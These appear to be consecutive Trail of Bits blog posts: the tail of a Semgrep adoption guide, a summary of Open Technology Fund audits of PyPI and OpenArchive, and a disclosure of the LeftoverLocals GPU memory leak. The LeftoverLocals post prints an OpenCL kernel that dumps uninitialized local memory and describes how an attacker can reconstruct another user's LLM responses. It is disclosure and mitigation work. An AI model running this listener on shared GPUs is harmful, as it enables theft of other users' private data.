  • Provide an overview of how to write custom rules and emphasize that writing custom Semgrep rules is easy. Mention that the custom rules can be extended with the auto-fix feature using the fix: key. Encourage using metadata (i.e., CWE, confidence, likelihood, impact) in custom rules to support the vulnerability management process.
  • To help a developer answer the question, “Should I create a Semgrep rule for this problem?” you can use these follow-up questions:
  • Can we detect a specific security vulnerability?
    • Can we enforce best practices/conventions or maintain code consistency?
    • Can we optimize the code by detecting code patterns that affect performance?
    • Can we validate a specific business requirement or constraint?
    • Can we identify deprecated/unused code?
    • Can we spot any misconfiguration in a configuration file?
    • Is this a recurring question as you review your code?
    • How is code documentation handled, and what are the requirements for documentation?
  • Create places for the team to discuss Semgrep, write custom rules, troubleshoot (e.g., a Slack channel), and jot down ideas for Semgrep rules (e.g., on a Trello board). Also, consider writing custom rules for bugs found during your organization’s security audits/bug bounty program. A good idea is to aggregate quick notes to help your team use Semgrep (see the appendix below).
  • Pay attention to the Semgrep Community Slack, where the Semgrep community helps with problems or writing custom rules.
    Encourage the team to report existing limitations/bugs while using Semgrep to the Semgrep team by filling out GitHub issues (see this example issue submitted by Trail of Bits).

7.Implement Semgrep in the CI/CD pipeline by getting acquainted with the Semgrep documentation related to your CI vendor. Incorporating Semgrep incrementally is important to avoid overwhelming developers with too many results. So, try out a pilot test first on a repository. Then, implement the full Semgrep scan on a schedule on the main branch in the CI/CD pipeline. Finally, include a diff-aware scanning approach when an event triggers (e.g., a pull/merge request). A diff-aware approach scans only changes in files on a trigger, maintaining efficiency. This approach should examine a fine-tuned set of rules that provide high confidence and true positive results. Once the Semgrep implementation is mature, configure Semgrep in the CI/CD pipeline to block the PR pipeline with unresolved Semgrep findings.

What’s next? Maximizing the value of Semgrep in your organization

As you introduce Semgrep to your organization, remember that it undergoes frequent updates. To make the most of its benefits, assign one person in your organization to be responsible for analyzing new features (e.g., Semgrep Pro, which extends codebase scanning with inter-file coding paradigms instead of Semgrep’s single-file approach), informing the team about external repositories of Semgrep rules, and determining the value of the paid subscription (e.g., access to premium rules).

Furthermore, use the Trail of Bits Testing Handbook, a concise guide that helps developers and security professionals maximize the potential of static and dynamic analysis tools. The first chapter of this handbook focuses specifically on Semgrep. Check it out to learn more!

Appendix: Things I wish I’d known before I started using it

Using Semgrep

  • Use the --sarif output flag with the Sarif Viewer extension in Visual Studio Code to efficiently navigate through the identified code.
  • The --config auto option may miss some vulnerabilities. Manual language selection (--lang) and rulesets can be more effective.
  • You can use the alias: alias semgrep="semgrep --metrics=off" or SEMGREP_SEND_METRICS environment variable to remember to disable metrics.
  • Use the ephemeral rules, e.g., semgrep -e ‘exec(...)’ —lang=py ./, to quickly use Semgrep in the style of the grep tool.
  • You can use the autocomplete feature to use the TAB key to work faster with the command line.
  • You can run several predefined configurations simultaneously: semgrep --config p/cwe-top-25 --config p/jwt.
  • A Semgrep Pro Engine feature removes Semgrep’s limitations in analyzing only single files.
  • Rules from the Semgrep Registry can be tested in a playground (see Trail of Bits anonymous-race-condition rule).
  • Metavariable analysis supports two analyzers: redos and entropy.
  • You can use metavariable-pattern to match patterns across different languages within a single file (e.g., JavaScript embedded in HTML).
  • The focus-metavariable can reduce false positives in taint mode.

Writing rules

  • Metavariables must be capitalized: $A, not $a
  • Use pattern-regex: (?s)\A.*\Z pattern to identify a file that does not contain a specific string (see example)
  • When writing a regular expression in multiple lines, use the >- characters, not |. The | character writes a newline character (\n) and will likely cause the regex to fail (see example)
  • You can use typed metavariables, e.g., $X == (String $Y)
  • Semgrep supports variable assignment statements in the following way:

  • You can use the method chaining:

  • The Deep Expression Operator matches complex, nested expressions using the syntax
    <... pattern ...>

  • It is possible to apply specific rules to specific paths using the paths keyword (see the avoid-apt-get-upgrade rule, which applies only to Dockerfiles):
        paths:
          include:
            - "*dockerfile*"
            - "*Dockerfile*"
    
  • And last, Trail of Bits has a public Semgrep rules repository! Check it out here and use it immediately with the semgrep --config p/trailofbits command.

Useful links

For more on creating custom rules, read our blogs on machine learning libraries and discovering goroutine leaks.
We’ve compiled a list of additional resources to further assist you in your Semgrep adoption process. These links provide a variety of perspectives and detailed information about the tool, its applications, and the community that supports it:

Internet freedom with the Open Technology Fund

15 January 2024 at 13:30

By Spencer Michaels, William Woodruff, Jeff Braswell, and Cliff Smith

Trail of Bits cares about internet freedom, and one of our most valued partners in pursuit of that goal is the Open Technology Fund (OTF). Our core values involve focusing on high-impact work, including work with a positive social impact. The OTF’s Red Team Lab exists to provide auditing services for the software that protects privacy and ensures open access to the internet, free of censorship. We’re a proud member of the Red Team Lab and have performed numerous engagements on software products that are critical to internet freedom. See what we’ve been up to below.

Security and usability improvements to PyPI

Back in 2019, we partnered with Changeset Consulting and Kabu Creative through the OTF to make security and usability improvements to Warehouse, the codebase that powers the Python Package Index (PyPI). PyPI’s criticality within the Python ecosystem is impossible to overstate: with over 500,000 projects and 750,000 project maintainers as of 2024, PyPI serves over a billion package downloads daily.

Our work on PyPI had four major angles:

  • Implementing strong multi-factor authentication (MFA) methods on PyPI, in the forms of TOTP and WebAuthn
  • Adding scopeable API tokens to PyPI to allow project maintainers to move away from insecure username/password pairs for package publishing
  • Adding audit events to PyPI users and projects so maintainers could review security-sensitive actions performed on their accounts and projects
  • Adding accessibility and internationalization enhancements to PyPI’s Web UI, including alignment with the W3C’s Web Content Accessibility Guidelines

Our work was an essential part of PyPI’s modernization efforts, following on the heels of Warehouse’s 2018 public beta. Scoped API tokens and modern MFA methods also made PyPI an early “gold standard” for package index security practices, with other major indices subsequently adding WebAuthn and scopeable API tokens once their security and usability benefits were clear.

All told, these improvements helped raise the security bar for one of the internet’s most critical packaging ecosystems. In doing so, they also demonstrated that indices can make security-enhancing changes without compromising users’ and developers’ ordinary workflows.

Auditing PyPI and its deployment infrastructure

In 2023, we came back to PyPI on the assurance side: in August and September, we audited a medley of codebases tied to PyPI and its deployment infrastructure:

  • Warehouse itself, which makes up the bulk of PyPI’s front end and back end
  • cabotage, which provides a Heroku-esque deployment substrate for PyPI’s runtime services
  • readme_renderer, which PyPI uses to safely render arbitrary (package-supplied) README files into HTML

Our audits of these codebases took place over 10 engineer-weeks and uncovered a total of 29 findings, including some with the potential to disclose otherwise private account states or compromise the integrity of PyPI’s runtime services. We concluded our audit with a fix review, in which we determined that PyPI’s maintainers had satisfactorily patched or otherwise mitigated every finding.

The results of our audits validated PyPI’s development philosophy: a strong emphasis on automated testing, linting, and QA meant that relatively few low-hanging bugs were found and that the majority of findings occurred in parts of the codebase where individual services could interact in unintended ways. We believe this merits consideration in other packaging ecosystems, especially as general interest in supply chain security rises. An ounce of prevention in the form of tests and automated QA is worth a pound of cure at the time of the audit.

You can read our audit report, as well as our accompanying blog post, for more details. PyPI’s administrators have also released a three-part blog post series with an in-depth analysis of each finding: part 1, part 2, and part 3.

OpenArchive’s Save application on iOS and Android

Human rights activists, journalists, and civil society organizations all have a common need to preserve and share media in a way that protects privacy while avoiding data loss and tampering. The OpenArchive Save app provides this diverse group of users with a way to securely upload photos and videos to shared storage providers, optionally using the Tor anonymization network and including cryptographic signatures that authenticate the media files. We recently conducted two code reviews for the iOS and Android versions of the Save app.

Using a threat model that included bad-acting nation states with broad censorship powers, our consultants assessed the Save applications using dynamic testing and code review. OpenArchive worked quickly to improve the security and design of the applications, including performing substantial refactoring, in the months following our engagement. These updates helped defend against social engineering, protect locally stored media and credentials from theft, and ensure safe transmission of data across networks operated by a hostile adversary. We also provided guidance that will help OpenArchive make the best possible use of available cryptographic tools in the future. You can see the publications for each application version in our publications repository: the iOS summary report and the Android summary report.

What the future holds

Knowing the OTF’s vision of “community, collaboration, and curiosity,” we are looking forward to bringing our foundation in fuzzing and continuous testing to future engagements. After all, we often find issues that would be easy to spot early in development with the correct security tooling but that make their way across the software life cycle undetected. In the spirit of collaboration, we’ve gathered what we’ve learned about continuous testing into our new Testing Handbook, which is free for everyone to use.

In addition to effective testing techniques, internet freedom requires reliable software development ecosystems to support open-source development. Our work connected to PyPI has improved the security posture of the Python ecosystem at large, and we welcome opportunities to continue this work in other domains.

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

16 January 2024 at 17:00

By Tyler Sorensen and Heidy Khlaaf

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries, as shown below:

Figure 1: An illustration of how LeftoverLocals can be used to implement an attack on an interactive LLM chat session. The LLM user (left) queries the LLM, while a co-resident attacker (right) can listen to the LLM response.

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.

Figure 2: LeftoverLocals logo: what leftover data is your ML model leaving for another user to steal?

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.

As of writing, the status of the impacted vendors, Apple, AMD, and Qualcomm are as follows:

  • Apple: Despite multiple efforts to establish contact through CERT/CC, we only received a response from Apple on January 13, 2024. We re-tested the vulnerability on January 10 where it appears that some devices have been patched, i.e., Apple iPad Air 3rd G (A12). However, the issue still appears to be present on the Apple MacBook Air (M2). Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been. Apple has confirmed that the A17 and M3 series processors contain fixes, but we have not been notified of the specific patches deployed across their devices.
  • AMD: We have confirmed with AMD that their devices remain impacted, although they continue to investigate potential mitigation plans. Their statement on the issue can be read here.
  • Qualcomm: We received notice that there is a patch to Qualcomm firmware v2.07 that addresses LeftoverLocals for some devices. However, there may still be other devices impacted at this time. A Qualcomm representative has provided the following comment: “Developing technologies that endeavor to support robust security and privacy is a priority for Qualcomm Technologies. We commend Dr. Tyler Sorensen and Dr. Heidy Khlaaf from the AI/ML Assurance group at Trail of Bits for using coordinated disclosure practices and are in the process of providing security updates to our customers. We encourage end users to apply security updates as they become available from their device makers.”
  • Imagination: Despite not observing LeftoverLocals ourselves across the Imagination GPUs that we tested, Google has confirmed that some Imagination GPUs are indeed impacted. Imagination released a fix in their latest DDK release, 23.3, made available to customers in December 2023.

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details:

  • NVIDIA: confirmed that their devices are not currently impacted. One reason for this could be that researchers have explored various memory leaks on NVIDIA GPUs previously, and thus, they are aware of these types of issues.
  • ARM: also confirmed that their devices are not currently impacted.

While we did not hear a response from these vendors, we tested at least one GPU from them and did not observe that they were impacted: Intel.

Exploit brief

GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had any significant consequences on applications. Historically, this entailed that GPU hardware and software stacks iterated rapidly, with frequent major architecture and programming model changes. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA simply provides a few short tables. This type of vague specification has led to alarming issues, both previously and currently, as LeftoverLocals exemplifies.

Exploitation requirements

This is a co-resident exploit, meaning that a threat actor’s avenue of attack could be implemented as another application, app, or user on a shared machine. The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers (at least in obtaining stolen data). We note that it appears that browser GPU frameworks (e.g., WebGPU) are not currently impacted, as they insert dynamic memory checks into GPU kernels.

Unless the user inspects the application’s low-level GPU source-code, it is not possible for them to uncover if their application is utilizing GPU local memory; this matter is further complicated as the GPU code is often hidden deep in library calls, at low levels of deep software stacks (e.g., for ML). Overall, there are very limited ways to observe that an attacker is currently stealing data, or has stolen data. This attack hinges on the attacker reading uninitialized memory on the GPU, and while this is technically undefined behavior, it is not currently checked dynamically, or logged. Any additional defenses would be quite invasive, e.g., performing code analysis on GPU kernels to check for undefined behavior.

We have released a PoC that exploits this vulnerability, and the sections below describe how it works.

User mitigations

Given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, the GPU threads should clear memory (e.g., store 0s) to any local memory memory locations that were used in the kernel. Additionally, the users should ensure the compiler doesn’t remove these memory-clearing instructions away (e.g., by annotating their local memory as volatile), as the compiler may detect that the cleared memory is not used later in the kernel. This is difficult to verify because GPU binaries are typically not stored explicitly, and there are very few GPU binary analysis tools. Because of reasons like this, we note that this mitigation may be difficult for many users, and we discuss this further in “Mitigations” below.

The vulnerability: LeftoverLocals

In this section we describe the vulnerability, named LeftoverLocals, and the corresponding exploit in more detail. We then detail our testing campaign across a wide variety of GPU devices, which found that GPUs from AMD, Apple, and Qualcomm are vulnerable to LeftoverLocals. For those unfamiliar with GPU architecture and terminology, we provide a more in-depth level-setter in “Background: How GPUs work.” We also note that while GPU memory leaks are not new (a further discussion follows below), LeftoverLocals has demonstrated both deeper impact and wider breadth than previously discovered vulnerabilities.

At a high level, we found that several GPU frameworks do not sufficiently isolate memory in the same way that it is traditionally expected in CPU-based frameworks. We have observed that on impacted GPUs, it is possible for one kernel—potentially from another user that is co-resident on the same machine—to observe values in local memory that were written by another kernel. Thus, an attacker who has access to a shared GPU through its programmable interface (e.g., OpenCL) can steal memory from other users and processes, violating traditional process isolation properties. This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights.

Previous academic work showed that NVIDIA GPUs leaked memory across processes through a variety of memory regions, including local memory. However, they examined only GPUs from NVIDIA (and the results from this paper may be part of the reason why we didn’t observe LocalLeftovers on NVIDIA GPUs). They also did not discuss the impact on widely deployed use-cases, such as ML. Other works have shown how GPUs leak graphics data, and that a co-resident attacker can reconstruct partial visual information from another process (see some examples documented here, here, and here). Despite these prior works, LeftoverLocals shows that many GPUs remain vulnerable to local memory leaks and that this vulnerability can be exploited in co-resident attacks on important ML applications.

Overall, this vulnerability can be illustrated using two simple programs: a Listener and a Writer, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values. The Listener repeatedly launches a GPU kernel that reads from uninitialized local memory. The Writer repeatedly launches a GPU kernel that writes canary values to local memory. Below, we demonstrate how each of these operations is carried out.

The Listener: The Listener launches a GPU kernel that reads from uninitialized local memory and stores the result in a persistent main memory region (i.e., global memory). This can be accomplished with the OpenCL kernel below:

__kernel void listener(__global volatile int *dump) {
  local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i+= get_local_size(0)) {
    dump[((LM_SIZE * get_group_id(0)) + i)] = lm[i];
  }
}

The keyword __kernel denotes that this is the GPU kernel function. We pass a global memory array dump to the function. Whatever the kernel writes to this array can be read later by the CPU. We statically declare a local memory array lm with a predefined size LM_SIZE (which we set to be the max size of local memory for each GPU we test). This program technically contains undefined behavior, as it reads from uninitialized local memory. Because of this, we use the volatile qualifier to suppress aggressive compiler optimizations that might optimize away the memory accesses. In fact, our code contains a few more code patterns included to further stop the compiler from optimizing away our memory dump. This process is more of a trial-and-error process than a science.

For each loop iteration, the invocation (thread) is read from a location in local memory, and that location is dumped to a unique location in the dump array. The only tricky part of this code is the indexing, because local memory is disjointed across workgroups, so workgroup local IDs need to be mapped to a unique global ID in dump. The process utilizes built-in identifiers to achieve this, which are documented here. At the end of the kernel, dump contains every value that was stored in local memory when the listener kernel started executing. Because dump is in the global memory region, it can be examined by the CPU host code to check for canary values.

The Writer: On the other hand, the Writer launches a kernel that writes a canary value to local memory (for example, this work uses the value 123). We show an example of the OpenCL kernel code below:

__kernel void writer(__global volatile int *canary) {
  local volatile int lm[LM_SIZE];
  for (uint i = get_local_id(0); i < LM_SIZE; i+=get_local_size(0)) {
    lm[i] = canary[i];
  }
}

This code is very similar to the Listener, except that rather than dumping local memory, we are writing a value. In this case, we are writing a value from an array canary. We use an extra array so that the compiler does not optimize away the memory write (as it is prone to do with constant values). At the end of the kernel, the writer has filled all available local memory with the canary values.

The CPU programs for both the Listener and the Writer launch their respective kernels repeatedly. In the case of the listener, at each iteration, the CPU analyzes the values observed in the local memory and checks for the canary value. On a server, these two programs can be run by different users or in different Docker containers. On a mobile device, these routines can be run in different apps. The apps can be swapped in and out of focus to alternate reading and writing. If the Listener can reliably read the canary values, then we say that the platform is vulnerable to LeftoverLocals.

The following animation shows how the listener and writer interact, and how the listener may observe values from the writer if local memory is not cleared.

Figure 3: A Listener and a Writer processes, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values

Listening to LLM responses

In this section, we provide an overview of how LeftoverLocals can be exploited by a malicious actor (an attacker) to listen to another user’s (the victim) LLM responses on a multi-tenant GPU machine, followed by a detailed description of the PoC.

At a high level, both actors are executed as co-resident processes. The attack process implements the listener described above, with the additional steps of comparing the stolen values to various fingerprints. The victim process is unknowingly the writer, where instead of canary values, the values being written are sensitive components of an interactive LLM chat session. The attack ultimately follows two steps:

  • The attack process fingerprints the model that the victim process is using by repeatedly dumping (i.e., listening) to the leftover local memory, which, in this scenario, consists of sensitive components of linear algebra operations used by the victim in the LLM model architecture.
  • The attacker then repeatedly listens to the victim’s process again, specifically seeking for an LLM to execute the output layer, which can be identified using weights or memory layout patterns from the earlier fingerprinting.

Note that the output layer is a matrix-vector multiplication with two inputs: the model weights, and the layer input—in other words, the values derived from the user input that propagated through the earlier levels of the deep neural network (DNN). Given that the model weights of the output layer are too large to comprehensively steal, an attacker can inspect available open-source models to fully obtain the weights through the exposed model fingerprint. We found that the second input to the last layer (i.e., the layer input) is subsequently small enough to fit into local memory. Thus, the entire layer input can be stolen, and the attacker can reproduce the final layer computation to uncover the final result of the DNN.

Figure 4: Steps of the PoC exploit whereby an attacker process can uncover data to listen to another user’s interactive LLM session with high fidelity

We note that this is a fairly straightforward attack, and with further creativity and ingenuity, a threat actor may be able to construct further complex and sophisticated malicious scenarios that may compromise ML applications in more severe ways. Below we provide a detailed description of the PoC, and the configuration and testing carried out on various GPU platforms to uncover their susceptibility to LeftoverLocals.

Our configuration: We outline our configuration in the table below. Our attack builds on the llama.cpp LLM due to its simplicity and variety of support for GPU acceleration. In our example we use a large discrete GPU that we found to be susceptible to LeftoverLocals: the AMD Radeon RX 7900 XT. We configure llama.cpp to use OpenCL for GPU acceleration, which uses the CLBLAST linear algebra library. We use the wizardLM-7B.ggmlv3.q5_0.bin model, which can be obtained from Hugging Face. This model was selected due to its reasonable size, which enabled rapid prototyping and analysis; however, this attack is transferable to many different models. In our threat model, we assume that the victim is using the LLM in an interactive chat session.

Modification: The attack requires an optimized GPU implementation of matrix-vector multiplication. We found that the current matrix-vector multiplication in llama.cpp (which does not call into CLBLAST) is not implemented in an optimized idiomatic way. It stores partial dot product results in local memory and then combines them at the end. While there is a more complex approach using linear algebra to achieve our same results, for the simplicity of our PoC and demonstration, we replace the llama.cpp matrix-vector multiplication with our own that is more idiomatic (following best GPU programming programming practices).

Step 1—Fingerprinting the model: An attacker can fingerprint a model if it can listen to several inference queries from the victim. In our configuration, the GPU contains roughly 5MB of local memory. The model has roughly 33 layers, each of them consisting of a matrix multiplication operation. Matrix multiplication is often optimized on GPUs by using tiling: an approach that subdivides the matrices into small matrices, performs the multiplication, and then combines the results (as detailed here). In many optimized libraries, including CLBLAST, local memory is used to cache the smaller matrices. Thus, for every layer, the attacker can steal ~2.5MB of weights, and ~2.5MB of the inputs. While this is a significant amount of data, we note that it is not enough to reconstruct the entire computation. Many of these layers have weights and inputs that are 100s of MB large.

However, for a whole inference computation (33 layers), the attacker can steal around 80MB of the weights, which is sufficient to fingerprint the model (assuming the user is using an open-source model, such as one that can be found on Hugging Face). Given this, we assume that it is a straightforward task to fingerprint the model, and thus for the attacker to obtain the full model being used by the victim.

Step 2—Listening to the LLM output: The attacker can then turn their attention to the output layer of the DNN. In our configuration, we found that the output layer is a matrix-vector multiplication, rather than a matrix-matrix multiplication. The weights matrix is large (~128MB), but the input vector is quite small (~4KB). However, given that the attacker has fingerprinted the model in step 1, the attacker does not need to comprehensively steal the weights as they are available from the fingerprinted model.

Matrix-vector multiplication has a different GPU implementation than matrix-matrix multiplication. In the case where the input vector fits in local memory, the most performant implementation is often to cache the input vector in local memory, as it is used repeatedly (i.e., for repeated dot products). Because the input vector is stored entirely in local memory, the attacker can steal this entire vector. In determining whether the attacker has found local memory from the output layer, we discovered that the attacker could simply look for 4KB of floating point values with zeros on either side. In our testing, this unique fingerprint was associated with the output layer nearly every single time. For different models and different GPUs, this fingerprint will likely have to be recalibrated.

Putting it together: With an attacker in possession of both the weights and the input vector, they can perform the final computation and obtain the result of the inference. This allows the attacker to reproduce the output of the victim’s LLM chat session with high fidelity, as demonstrated in the introduction. In practice, we tuned the attacker to dump the local memory very efficiently (that is, by using only a small number of threads and requiring a small amount of memory). This allows the attacker to listen to long chat queries with only a small number of noticeable artifacts. Some of the artifacts observed include:

  • Duplicate tokens: This occurs when the attacker steals the same output layer twice due to circumstances such as the attacker process being scheduled twice in a row, thus the LLM was not scheduled to compute its next token.
  • Missing tokens: This occurs when the attacker kernel isn’t scheduled at the right time, i.e., immediately after the output layer computation kernel.
  • Incorrect tokens outputted occurring due to:
  • the attacker mis-identifying a stolen set of data to be the last layer. In this case, it will print a junk token.
  • Production of a token that is “close” to the original output, even if it is not exact. That is, the attacker may be unable to steal the exact token embedding at the target layer. This results in a corrupted token embedding which, when decoded, is semantically similar (in the word2vec sense) to the original token. As an example, in the GIF provided at the beginning, the attacker extracts the incorrect word “Facebook”, which is semantically similar to other Named Entities tokens (like “Google”, and “Amazon”) in the generated text.

Despite these discrepant artifacts, the stolen text is more than sufficient to uncover the LLM response. Additionally, the attacker can be further tuned by, for example, having multiple threads launch the listener kernel or by having a more precise fingerprint of the last layer.

Testing GPU platforms for LeftoverLocals

Given the diversity of the devices we tested, there exists several applications that can test for LeftoverLocals written in a variety of frameworks:

  • Vulkan Command Line: A command line application using Vulkan. The kernel is written in OpenCL and compiled to SPIR-V using clspv. It uses a simple Vulkan wrapper called EasyVK.
  • OpenCL Command Line: A command line application that uses the OpenCL framework.
  • Apple App: An Apple app that can be deployed on iOS or Mac OS. It targets the GPU using Apple’s Metal framework.
  • Android App: An Android app that uses Vulkan to target mobile GPUs. The code uses Vulkan’s C API (through EasyVK again) using JNI. The kernels are the same as in the Vulkan command line app: they are written in OpenCL and compiled to SPIR-V using clspv.

Using the above programs, we tested 11 devices spanning seven GPU vendors (and multiple GPU frameworks in some cases). We observed LeftoverLocals on devices from three of the vendors (Apple, Qualcomm, and AMD). The amount of memory leaked depends on the size of the GPU. Larger GPUs contain more physical memory, and thus, leak more data. For the larger GPUs (e.g., an AMD Radeon RX 7900 XT), we found that we can leak over ~5MB per kernel. The following tables outlines the system info for the GPUs we were able to observe LeftoverLocals (QC refers to Qualcomm):

For some devices, specifically those from Arm, we were not able to observe the canary value from the Writer in the Listener, but we did observe non-zero data. Representatives from Arm reviewed our observations and concluded that although these values are not zero, they are not from a memory leak.

Additionally, we tested some GPUs from NVIDIA, Intel, and Imagination. For these devices, we observed only zeros in local memory, and thus did not observe LeftoverLocals. It is unclear if all their devices are not impacted. For example, although we did not observe the issue on our Imagination device, Google notified us that they were able to observe it on other Imagination devices.

The following YouTube video demonstrates the different interfaces and examples of LocalLeftovers—namely the LLM PoC attack, covert communication channels, and searching for canary values—on a few different platforms using a few different applications.

Vulnerable environments: An attack program must be co-resident on the same machine and must be “listening” at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Next, we briefly discuss other environments where GPUs are either deployed or where an attacker might have access to sensitive information. Although it appears that some current systems (e.g., WebGPU) are not currently impacted, the ever-growing prevalence of ML and the diversity of modern GPUs mean that the next iteration of these systems (or other near-future systems) may be severely compromised by these types of vulnerabilities.

  • Cloud providers: Cloud providers (e.g., AWS and Azure) are unlikely to provide shared GPU instances, especially if users have dedicated access to the GPU machine. In other cases, GPUs could be shared using very conservative GPU VM technology (such as NVIDIA’s vGPU or MxGPU), which physically partitions the GPU and therefore prevents users from sharing GPU resources (e.g., local memory). Given this, many current cloud GPU systems may not currently be vulnerable to LeftoverLocals; however, we do not have conclusive evidence to determine this given the general lack of visibility into the specification and implementation of these systems. We note that we have observed LeftoverLocals on multi-user Linux servers, as well as on desktop (Windows and Mac) systems through traditional multi-processing. This includes Docker containers on these systems.
  • Mobile applications: In our experiments and explorations in the mobile domain, we were able to run concurrent GPU processes (from different apps on iOS or Android) only in very specific instances. That is, we were not able to run a GPU process (e.g., from a malicious listener app) in the background while other apps (e.g., the victim) were run in the foreground. As with our analysis of cloud providers, we were unable to find clear documentation that explicitly detailed these constraints, and so we cannot definitively claim whether they are vulnerable. However, as seen in the video above, LeftoverLocals can be exploited either when a malicious listener app is run side-by-side with a victim app, or if the malicious listener app is quickly swapped from the background into the foreground from a victim app.
  • Remote attacks: We preliminarily investigated the possibility of attacks originating from websites (e.g., those hosted by a remote attacker). To our knowledge, web applications do not have the low-level features required to listen to local memory using GPU graphics frameworks, such as WebGL. We note that the new WebGPU framework does provide low-level capabilities that allow a webpage to access local memory. Conservatively, WebGPU initializes and performs dynamic array bounds checking on local memory (and global memory), which mitigates this vulnerability. However, these checks cause significant overhead, as documented in discussions like this one. To test this further, our code repo contains a simple listener in WebGPU. As expected, we have only observed zeros in local memory, even on devices that are vulnerable to LeftoverLocals through other frameworks. However, GPU compilers are known to be fragile, and it is not difficult to imagine finding a compiler bug that could somehow bypass these checks (especially using fuzzing techniques). Our position is that LocalLeftovers should be addressed at a lower level (e.g., the driver).

How GPU vendors can resolve this vulnerability: To defend against LocalLeftovers, GPUs should clear their local memory between kernel calls. While this could cause some performance overhead, our experiments show that many GPU vendors (e.g., NVIDIA, Intel) currently appear to provide this functionality. It even appears that some of this functionality is provided for impacted GPUs. For example, Mesa drivers for AMD GPUs clears local memory after a compute kernel launch. However, this approach has a fundamental flaw that makes it vulnerable to LeftoverLocals: this memory wipe is done with a separate kernel, thus, the GPU kernel queue may contain a malicious listener between the computation kernel and the local memory wipe, allowing the listener to steal memory. Instead, the computation kernel and the local memory wipe need to occur atomically, i.e., without allowing any other kernel to be interleaved between them. Otherwise, a user may attempt to preemptively defend themselves against LeftoverLocals as described in the next section.

Mitigations: In light of a lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. As we’ve previously noted, before the kernel ends, the GPU threads should store 0 to any local memory locations that were used in the kernel. Given that GPU tasks are typically interleaved at the kernel boundary, this will prevent another user from being able to read leftover values. We note that this mitigation may be difficult for many users, especially because GPU code is often buried deep in complex software stacks (e.g., for ML). Furthermore, the GPU code may be part of a highly optimized library (e.g., ML linear algebra routines). In these cases, it is very difficult to identify how local memory is used, and even more difficult to modify the kernel to zero it out. It may be possible to augment a compiler to add this functionality, similar to how WebGPU handles GPU memory accesses (described above). These mitigations do have a performance overhead that should be taken into account. Another blunt mitigation involves simply avoiding multi-tenant GPU environments.

Impact on LLMs and GPU platforms

LLM security

Our PoC attack examines only one application: an interactive open-source LLM session. However, with a little creativity, attackers could likely target many GPU applications, including those used within privacy-sensitive domains. Our motivation stems from the recent increased use and support of open-source models, often accompanied by claims that their “openness” inherently entails safety and security through transparency. A recent article in Nature even alleges that only open-source generative AI models can “safely” revolutionize health care, a safety-critical domain. Yet, even if open-source models provide the opportunity to be rigorously audited and assessed (which they have yet to be), their deployment still hinges on a closed-source stack (i.e., GPUs). And as demonstrated by LeftoverLocals, open-source LLMs are particularly susceptible to our vulnerability given our ability to fingerprint these models to obtain remaining weights as needed. Indeed, we have already observed announcements regarding the deployment of open-source models in collaboration with impacted GPU vendors, including Hugging Face’s collaboration with AMD, Lamini’s deployment on AMD GPUs, and the Qualcomm and Meta partnership for edge devices.

Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system. It is crucial to identify and taxonomize novel classes of failure modes that directly impact ML models, in addition to novel threats that can compromise the ML Ops pipeline, as we have demonstrated with LeftoverLocals. We discuss GPU-specific threat implications in the following section.

GPU providers, applications, and vendors

While many platforms are not currently impacted (see Vulnerable environments), we emphasize that the GPU compute landscape is evolving rapidly. As some examples: a growing number of GPU cloud providers have various policies and available configurations; and GPU programming frameworks, such as Vulkan and Metal, are well-supported on mainstream platforms, and can be used in apps without requiring extra privileges. While these developments are exciting, they increase the threat potential of GPU vulnerabilities, as LeftoverLocals illustrates. As far as we are aware, there is no unified security specification for how GPUs are required to handle sensitive data, and no portable test suite to check if systems are vulnerable to simple memory leaks, like LeftoverLocals. Thus, GPU compute environments should be rigorously scrutinized when used for processing any type of sensitive data.

